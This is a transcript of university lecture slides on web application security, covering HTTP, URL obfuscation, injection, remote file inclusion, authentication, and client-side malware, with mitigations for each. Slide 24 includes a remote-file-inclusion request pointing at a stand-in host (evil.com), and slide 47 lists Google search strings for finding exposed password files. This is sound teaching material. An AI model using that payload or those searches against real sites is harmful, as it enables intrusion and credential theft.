1 / 51

CSC 482/582: Computer Security

CSC 482/582: Computer Security. Web Security. Topics. Why web application security? HTTP and web input types Web Application Vulnerabilities Client-side Attacks Finding Web Vulnerabilities. Why Web Application Security?. Why Web Application Security?. Web Transactions. Web Server.

masato
Download Presentation

CSC 482/582: Computer Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. CSC 482/582: Computer Security Web Security CSC 482/582: Computer Security

  2. Topics • Why web application security? • HTTP and web input types • Web Application Vulnerabilities • Client-side Attacks • Finding Web Vulnerabilities CSC 482/582: Computer Security

  3. Why Web Application Security? CSC 482/582: Computer Security

  4. Why Web Application Security? CSC 482/582: Computer Security

  5. Web Transactions Web Server HTTP Request Web Browser Network OS HTTP Response CSC 482/582: Computer Security

  6. HTTP: HyperText Transfer Protocol Simple request/respond protocol • Request methods: GET, POST, HEAD, etc. • Protocol versions: 1.0, 1.1 Stateless • Each request independent of previous requests, i.e. request #2 doesn’t know you auth’d in #1. • Applications responsible for handling state. CSC 482/582: Computer Security

  7. HTTP Request GET http://www.google.com/ HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko/20060909 Firefox/1.5.0.7 Accept: text/html, image/png, */* Accept-Language: en-us,en;q=0.5 Cookie: rememberme=true; PREF=ID=21039ab4bbc49153:FF=4 Method URL Protocol Version Headers Blank Line No Data for GET method CSC 482/582: Computer Security

  8. HTTP Response HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Server: GWS/2.1 Date: Fri, 13 Oct 2006 03:16:30 GMT <HTML> ... (page data) ... </HTML> Protocol Version HTTP Response Code Headers Blank Line Web Page Data CSC 482/582: Computer Security

  9. Client Side HTTP requests may reveal private info. HTTP responses may reveal private info. HTTP responses may include malicious code (Java, ActiveX, Javascript) Server Side HTTP requests may contain malicious input. HTTP requests may have forged authentication. HTTP responses may be intercepted. Different Perspectives CSC 482/582: Computer Security

  10. Web-based Input • Client and Server Perspectives • Types of Input • URL parameters • HTML • Cookies • Javascript • Cross-Site Scripting CSC 482/582: Computer Security

  11. URL Format <proto>://<user>@<host>:<port>/<path>?<qstr> • Whitespace marks end of URL • “@” separates userinfo from host • “?” marks beginning of query string • “&” separates query parameters • %HH represents character with hex values • ex: %20 represents a space http://username:password@www.auth.com:8001/a%20spaced%20path CSC 482/582: Computer Security

  12. URL Parameters • Client controls query-string • Cannot limit values to those specified in form • Any character can be URL-encoded • Even if it doesn’t need to be. • Any valid format may be used to disguise true destination of URL CSC 482/582: Computer Security

  13. URL Obfuscation IP address representations • Dotted quad (decimal, octal, hexadecimal) • Hexadecimal without dots (with left padding) • dword (32-bit int) Examples: www.eecs.utoledo.edu • 131.183.19.14 (dotted quad) • 0xDEDA83B7130E (hexadecimal + padding) • 2209813262 (dword) CSC 482/582: Computer Security

  14. HTML Special Characters • “<“ begins a tag • “>” ends a tag • some browsers will auto-insert matching “<“ • “&” begins a character entity • ex: &lt; represents literal “<“ character • Quotes(‘ and “) used to enclose attribute values CSC 482/582: Computer Security

  15. Character Set Encoding • Default: ISO-8859-1 (Latin-1) • Char sets dictate which chars are special • UTF-8 allows multiple representations • Force Latin-1 encoding of web page with: • <META http-equiv=“Content-Type” content=“text/html; charset=ISO-8859-1”> CSC 482/582: Computer Security

  16. Hidden Fields <input type=“hidden” name=“user” value=“james”> • Used to propagate data between HTTP requests since protocol is stateless • Clearly visible in HTML source • Form can be copied, modified to change hidden fields, then used to invoke script CSC 482/582: Computer Security

  17. Cookies Server to Client Content-type: text/html Set-Cookie: foo=bar; path=/; expires Fri, 20-Feb-2004 23:59:00 GMT Client to Server Content-type: text/html Cookie: foo=bar CSC 482/582: Computer Security

  18. Client Side URLs may not lead where they seem to. Cookies can be used to track your browsing. Pages may include malicious code (Java, ActiveX, Javascript) Server Side Cookies aren’t confidential. Hidden fields aren’t secret. Client may use own forms. URLs can have any format. POST data can have any format. Cookies can have any format. Web Input Summary CSC 482/582: Computer Security

  19. Web Application Vulnerabilities CSC 482/582: Computer Security

  20. Common Vulnerability Types CSC 482/582: Computer Security

  21. Injection • Injection attacks trick an application into including unintended commands in the data send to an interpreter. • Interpreters • Interpret strings as commands. • Ex: SQL, shell (cmd.exe, bash), LDAP, XPath • Key Idea • Input data from the application is executed as code by the interpreter. • Discussed in detail in its own lecture. CSC 482/582: Computer Security

  22. Cross-Site Attacks • Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing. • XSS used to obtain session ID for • Bank site (transfer money to attacker) • Shopping site (buy goods for attacker) • Key ideas • Attacker sends malicious code to server. • Victim’s browser loads code from server and runs it. • Discussed in detail in its own lecture. SIGCSE

  23. Insecure Remote File Inclusion • Insecure remote file inclusion vulnerabilities allow an attack to trick the application into executing code provided by the attacker on another site. • Dynamic code • Includes in PHP, Java, .NET • DTDs for XML documents • Key Idea • Attacker controls pathname for inclusion. CSC 482/582: Computer Security

  24. PHP Remote Inclusion Flaw A PHP product uses "require" or "include" statements, or equivalent statements, that use attacker-controlled data to identify code or HTML to be directly processed by the PHP interpreter before inclusion in the script. • <?php //config.php • $server_root = '/my/path'; • ?> • <?php //include.php • include($server_root . '/someotherfile.php'); • ?> • <?php • // index.php • include('config.php'); • include('include.php'); • // Script body • ?> • GET /include.php?server_root=http://evil.com/command.txt CSC 482/582: Computer Security

  25. Mitigating Remote File Inclusion • Turn off remote file inclusion. • Do not run code from uploaded files. • Do not use user-supplied paths. • Validate all paths before loading code. CSC 482/582: Computer Security

  26. Authentication • Authentication is the process of determining a user’s identity. • Key Ideas • HTTP is a stateless protocol. • Every request must be authenticated. • Use username/password on first request. • Use session IDs on subsequent queries. SIGCSE

  27. Authentication Attacks • Sniffing passwords • Guessing passwords • Identity management attacks • Replay attacks • Session ID fixation • Session ID guessing CSC 482/582: Computer Security

  28. Identity Management Attacks Auth requires identity management • User registration • Password changes and resets Mitigations • Use CAPTCHAs to protect registration. • Don’t use easy to guess secret questions. • Don’t allow attacker to reset e-mail address that new password is sent to. CSC 482/582: Computer Security

  29. Session ID Guessing Do session IDs show a pattern? • How does changing username change ID? • How do session IDs change with time? Brute forcing session IDs • Use program to try 1000s of session IDs. Mitigating guessing attacks • Use a large key space (128+ bits). • Use a cryptographically random algorithm. CSC 482/582: Computer Security

  30. Mitigating Authentication Attacks • Use SSL to prevent sniffing attacks. • Require strong passwords. • Use secure identity management. • Use a secure session ID mechanism. • IDs chosen at random from large space. • Regenerate session IDs with each request. • Expire session IDs in short time. CSC 482/582: Computer Security

  31. Access Control • Access control determines which users have access to which system resources. • Levels of access control • Site • URL • Function • Function(parameters) • Data CSC 482/582: Computer Security

  32. Mitigating Broken Access Control • Check every access. • Use whitelist model at every layer. • Do not rely on client-level access control. • Do not rely on security through obscurity. CSC 482/582: Computer Security

  33. Improper Error Handling • Applications can unintentionally leak information about configuration, architecture, or sensitive data when handling errors improperly. • Errors can provide too much data • Stack traces • SQL statements • Subsystem errors • User typos, such as passwords. CSC 482/582: Computer Security

  34. Example of Improper Error Handling mySQL error with query SELECT COUNT(*) FROM nucleus_comment as c WHERE c.citem=90: Can't open file: 'nucleus_comment.MYI' (errno: 145) Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/exalt2/public_html/username/nucleus/libs/COMMENTS.php on line 124 CSC 482/582: Computer Security

  35. Mitigating Improper Error Handling • Catch all exceptions. • Check all error codes. • Wrap application with catch-all handler. • Send user-friendly message to user. • Store details for debugging in log files. • Don’t log passwords or other sensitive data. CSC 482/582: Computer Security

  36. Insecure Storage • Storing sensitive data without encrypting it, or using a weak encryption algorithm, or using a strong encryption system improperly. • Problems • Not encrypting sensitive data. • Using home grown cryptography. • Insecure use of weak algorithms. • Storing keys in code or unprotected files. CSC 482/582: Computer Security

  37. Storage Recommendations Hash algorithms • MD5 and SHA1 look insecure. • Use SHA256. Encrypting data • Use AES with 128-bit keys. Key generation • Generate random keys. • Use secure random source. CSC 482/582: Computer Security

  38. Mitigating Insecure Storage • Use well studied public algorithms. • Use truly random keys. • Store keys in protected files. • Review code to ensure that all sensitive data is being encrypted. • Check database to ensure that all sensitive data is being encrypted. CSC 482/582: Computer Security

  39. Insecure Communication • Applications fail to encrypt sensitive data in transit from client to server and vice-versa. • Need to protect • User authentication and session data. • Sensitive data (CC numbers, SSNs) • Key Idea • Use SSL for all authentication connections. CSC 482/582: Computer Security

  40. Mitigating Insecure Communication • Use SSL for all authenticated sessions. • Use SSL for all sensitive data. • Verify that SSL is used with automated vulnerability scanning tools. CSC 482/582: Computer Security

  41. Client-side Attacks • Buffer Overflow • 2004 iframe • 2004-05 jpeg • Remote Code • ActiveX • Flash • Java • Javascript CSC 482/582: Computer Security

  42. ActiveX Executable code downloaded from server • Activated by HTML object tag. • Native code binary format. • Security model • Digital signature authentication • Zone-based access control • No control once execution starts CSC 482/582: Computer Security

  43. Digital signature authentication Sandbox Java • Sandbox Limits • Cannot read/write files. • Cannot start programs. • Network access limited to originating host. • Sandbox Components • Byte-code verifier • Class loader • Security manager CSC 482/582: Computer Security

  44. MPack Browser Malware • User visits site. • Response contains iframe. • Iframe code causes browser to make request. • Request redirected to MPack server. • Server identifies OS and browser, sends exploit that will work for client configuration. • Exploit causes browser to send request for code. • Mpack downloader sent to user, begins d/ling other malware. CSC 482/582: Computer Security

  45. MPack Commercial underground PHP software • Sold for $700-1000. • Comes with one year technical support. • Can purchase updated exploits for $50-150. Infection Techniques • Hacking into websites and adding iframes. • Sending HTML mail with iframes. • Typo-squatting domains. • Use GoogleAds to draw traffic. CSC 482/582: Computer Security

  46. Client Protection • Disable ActiveX and Java. • Use NoScript to limit Javascript. • Run browser with least privilege. • Use a browser sandbox: • VMWare Virtual Browser Appliance • Protected Mode IE (Windows Vista) • Goto sites directly instead of using links. • Use plain text e-mail instead of HTML. • Patch your browser regularly. • Use a personal firewall. CSC 482/582: Computer Security

  47. Web Reconnaissance Google Hacking • “Index of” +passwd • “Index of” +password.txt • filetype:htaccess user • allinurl:_vti_binshtml.exe Web Crawling • wget --mirror http://www.w3.org/ -o /mirror/w3 Santy Worm used Google to find vulnerable servers. CSC 482/582: Computer Security

  48. Proxies and Vulnerability Scanners • Achilles • OWASP Web Scarab • Paros Proxy • SPI Dynamics WebInspect • Edit Web Data • URL • Cookies • Form Data Web Proxy Web Server Web Browser CSC 482/582: Computer Security

  49. Achilles Proxy Screenshot CSC 482/582: Computer Security

  50. Key Points • All input can be dangerous • URLs, Cookies, Executable content • Consider both client and server security. • SSL is not a panacea • Confidentiality + integrity of data in transit. • Input-based attacks can be delivered via SSL. • Top Vulnerabilities • Cross-Site Scripting • SQL Injection • Remote File Inclusion CSC 482/582: Computer Security

More Related